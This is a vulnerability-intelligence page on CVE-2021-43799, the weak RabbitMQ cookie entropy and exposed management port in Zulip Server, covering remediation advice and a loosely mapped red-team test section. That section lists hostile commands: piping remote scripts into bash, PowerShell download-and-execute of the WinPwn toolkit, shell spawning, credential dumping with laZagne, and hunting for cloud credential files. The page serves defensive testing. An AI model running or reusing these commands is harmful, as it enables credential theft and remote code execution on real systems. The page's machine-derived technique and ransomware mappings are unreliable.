CVE-2021-43799
Overview
This vulnerability is an authentication bypass rooted in weak cryptographic entropy. The Zulip Server's bundled RabbitMQ component uses a weak pseudorandom number generator (PRNG) to create the default authentication cookie, resulting in limited entropy (approximately 20 bits) in versions prior to 4.9. Additionally, during initial installation before the first reboot or RabbitMQ restart, default ports including 25672 are not properly restricted, exposing RabbitMQ's management port to unauthenticated network access.
Vulnerability Description
Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.
Impact
An unauthenticated remote attacker with network access to the Zulip Server can brute-force the weak authentication cookie on RabbitMQ's management port (25672) to execute arbitrary code with rabbitmq user privileges and intercept all internal message traffic. This compromises confidentiality and integrity of user communications and enables remote code execution without user interaction. The attack requires no privileges or authentication (CVSS vector AV:N/AC:L/PR:N/UI:N). Unauthorized control over RabbitMQ facilitates lateral movement within the server environment and exposure of sensitive collaboration data.
Solution
Upgrade Zulip Server to version 4.9 or later, which includes a patch that strengthens the PRNG used for RabbitMQ's authentication cookie and properly restricts default ports after installation. Refer to the Zulip security advisory GHSA-p663-wxvv-2fjp for detailed patch instructions and commit a5496f4098e3998c9b84e8dc564aa983d6cdf6e8 for the code fix. As a workaround prior to upgrading, configure OS or network firewalls to block external access to ports 25672 and 5672 to prevent unauthorized connections to RabbitMQ.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
entropy
|
MEDIUM | — | correlation_ai |
Full Analysis
The vulnerability in the Zulip Server arises from the improper configuration of RabbitMQ, which is utilized for internal message passing. Specifically, during the initial installation phase, the server fails to adequately restrict access to certain critical ports, notably port 25672. This port serves as the RabbitMQ distribution port and is crucial for management tasks. The security of this port is further compromised by the use of a weak pseudorandom number generator (PRNG) for generating the "cookie" that protects it. The entropy of this cookie is limited to a mere 20 bits in practice, making it susceptible to brute-force attacks. The biased nature of the randomizer exacerbates this issue, as it reduces the effective randomness, allowing attackers to exploit the vulnerability with relative ease.
Attack vectors for this vulnerability are primarily remote, as an attacker only needs to gain access to the exposed port 25672. If firewalls are not configured to restrict access to this port, an attacker can initiate a brute-force attack against the weak cookie. Given the low entropy, the time required to successfully guess the cookie is significantly reduced, enabling the attacker to gain unauthorized access to the RabbitMQ management interface. Once access is achieved, the attacker can execute arbitrary code with the privileges of the rabbitmq user, potentially leading to a full compromise of the Zulip Server. Furthermore, the attacker can intercept and read all message traffic sent through RabbitMQ, which may include sensitive communications between users.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on Zulip for team collaboration. The ability to execute arbitrary code can lead to data breaches, unauthorized access to sensitive information, and disruption of services. Additionally, the interception of message traffic can expose confidential discussions, proprietary information, and personal data, leading to reputational damage and potential legal ramifications. The business risk extends beyond immediate financial losses; it can also result in long-term trust erosion among users and stakeholders, as well as regulatory scrutiny if sensitive data is compromised.
To detect and mitigate this vulnerability, organizations should prioritize the implementation of robust firewall rules to restrict access to the vulnerable ports, specifically 5672 and 25672. This should be a fundamental part of the server's security posture, ensuring that only trusted internal networks can communicate with RabbitMQ. Regular audits of firewall configurations and network access controls are essential to maintain a secure environment. Additionally, organizations should upgrade to version 4.9 or later of the Zulip Server, which includes a patch addressing this vulnerability. It is also advisable to conduct security assessments and penetration testing to identify any other potential weaknesses in the system.
In conclusion, the vulnerability associated with the Zulip Server's integration with RabbitMQ poses significant risks to organizations that utilize this collaboration tool. The combination of weak cookie protection and improper port exposure creates a pathway for remote attackers to exploit the system. Organizations must take proactive measures to secure their installations, including implementing strict firewall rules, upgrading to patched versions, and conducting regular security assessments to safeguard against potential exploitation. By addressing these vulnerabilities, organizations can better protect their sensitive communications and maintain the integrity of their collaborative efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zulip | Zulip | All |
cpe:2.3:a:zulip:zulip:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
scopion/CVE-2021-43799
Python Exploit Code
|
scopion | 1 | 2 | 2021-12-08 | View |
Ransomware Groups 1
Threat Feed
2 eventsRansomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-43799 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/zulip/zulip/security/advisories/GHSA-p663-wxvv-2fjp |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/zulip/zulip/commit/a5496f4098e3998c9b84e8dc564aa983d6cdf6e8 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/gteissier/erl-matter |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/zulip/zulip/releases/tag/4.9 |